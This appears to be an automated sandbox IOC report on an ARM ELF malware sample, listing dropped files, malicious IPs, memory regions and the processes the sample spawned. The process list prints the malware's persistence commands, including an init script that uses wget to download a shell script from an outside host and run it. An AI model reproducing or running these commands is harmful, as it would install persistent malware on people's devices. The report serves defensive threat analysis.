IOC Report
arm7.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
arm7.nn.elf
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
initial sample
 malicious
/etc/init.d/arm7.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.2gYL55 (deleted)
ASCII text
dropped
/tmp/qemu-open.OfnRF3 (deleted)
ASCII text, with no line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/arm7.nn.elf
/tmp/arm7.nn.elf
/tmp/arm7.nn.elf
-
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n /tmp/arm7.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/arm7.nn.elf
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
/tmp/arm7.nn.elf
-
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 24 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pen.gorillafirewall.su/
unknown

IPs

IP
Domain
Country
Malicious
154.216.17.220
unknown
Seychelles
malicious
91.92.246.113
unknown
Bulgaria
malicious
93.123.85.166
unknown
Bulgaria
malicious
45.202.35.64
unknown
Seychelles

Memdumps

Base Address
Regiontype
Protect
Malicious
7f321c030000
page execute read
 malicious
7f33237c7000
page read and write
7f33222e5000
page read and write
55c59a0e9000
page execute read
55c59c358000
page read and write
7ffcbc126000
page execute read
7f331bfff000
page read and write
7f33232db000
page read and write
7f331c021000
page read and write
7f321c039000
page read and write
7f3322b7f000
page read and write
7f3322ee1000
page read and write
55c59a343000
page read and write
7f332314c000
page read and write
7f332316f000
page read and write
7f332369e000
page read and write
55c59d0bc000
page read and write
7f33237eb000
page read and write
7f3322aed000
page read and write
7f33234bd000
page read and write
55c59c341000
page execute and read and write
7f321c03e000
page read and write
55c59a33a000
page read and write
7f3323830000
page read and write
7ffcbc107000
page read and write
There are 15 hidden memdumps, click here to show them.